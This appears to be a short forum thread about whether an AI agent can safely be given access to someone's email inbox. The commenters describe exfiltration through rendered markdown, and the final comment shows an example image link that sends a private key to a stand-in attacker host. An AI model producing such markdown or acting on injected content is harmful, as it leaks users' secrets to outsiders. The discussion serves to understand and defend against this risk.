top | item 47185538

(no title)

eli | 2 days ago

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.

discuss

oarsinsync|2 days ago

> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?

eli|5 hours ago

Not hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injectio...

adamckay|1 day ago

Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def